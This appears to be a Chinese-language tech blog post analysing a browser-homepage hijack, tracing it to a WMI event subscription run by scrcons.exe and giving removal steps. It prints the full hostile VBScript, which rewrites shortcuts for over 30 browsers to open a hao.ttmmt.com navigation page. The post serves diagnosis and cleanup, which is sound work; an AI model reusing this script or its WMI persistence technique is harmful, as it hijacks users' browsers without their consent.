先說說症狀
症狀①:通過快捷方式啟動瀏覽器,首頁跳轉到2345以及hao123網址導航頁,切系統內安裝的多款瀏覽器(IE、Chrome、Firefox、Opera、Safari、Maxthon)症狀相同
症狀②:金山毒霸會提示瀏覽器快捷方式異常,並刪除該快捷方式
分析問題
從毒霸刪除的文件中恢復快捷方式,查看快捷方式屬性,如下圖,可以看出,快捷方式的目標被添加了啟動參數
考慮到可能因為啟動項、服務、注冊表、事件和任務計划造成,但這些地方均未查出任何信息。
后來通過金山毒霸、NOD32等殺毒軟件掃描全盤,也未查出任何問題。
再后來想到了使用ProcessMonitor進行監視,發現每隔一段時間(我這里大概是半個小時的樣子)出現一個scrcons.exe進程自動啟動並修改快捷方式的命令,然后自動關閉(幸好是半個小時一次,要是3、5小時一次,那我估計得瘋了吧…)
查找資料,發現這應該是一個通過WMI發起的定時自動運行腳本。
要查看WMI事件,下載WMITool並安裝,
安裝后打開WMI event viewer,點擊左上角register for events,彈出Connect to namespace框,填入“root\CIMV2”,確定,出現下圖:
在右側選中后右擊 -> 選擇view instant properties
On Error Resume Next:Const link = "http://hao.ttmmt.com/?v=1030":Const link360 = "http://hao.ttmmt.com/?v=1030&s=3":browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,opera.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\Administrator\Desktop,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\Administrator\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs":browsersArr = split(browsers,","):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsersArr:oDic.Add LCase(browser), browser:Next:lnkpathsArr = split(lnkpaths,","):Set oFolders = CreateObject("scripting.dictionary"):For Each lnkpath In lnkpathsArr:oFolders.Add lnkpath, lnkpath:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):For Each oFolder In oFolders:If fso.FolderExists(oFolder) Then:For Each file In fso.GetFolder(oFolder).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:Set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:If LCase(name) = LCase("360se.exe") Then:oShellLink.Arguments = link360:Else:oShellLink.Arguments = link:End If:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:Next:
查看ScriptText項可知,這是一段VBScript調用系統服務間隔30分鍾執行一次,將所有瀏覽器調用加上"http://hao.ttmmt.com/?v=1030"(總算把你揪出來了,藏得夠深的)
受到影響的瀏覽器基本涵蓋了市面上現有的所有瀏覽器(30余款),如下:
"114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,opera.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe"
解決辦法:
選中左側選項,右鍵 -> 刪除!
刪不掉? 到WMITool安裝路徑(例如:D:\Program Files (x86)\WMI Tools)下,右鍵點擊wbemeventviewer.exe,選擇以管理員身份運行!再行刪之!
還沒完,還要手動將快速啟動欄中,將各個瀏覽器快捷命令中的"http://hao.ttmmt.com/?v=1030"去掉!
希望大家能夠把這解決方法普及開來...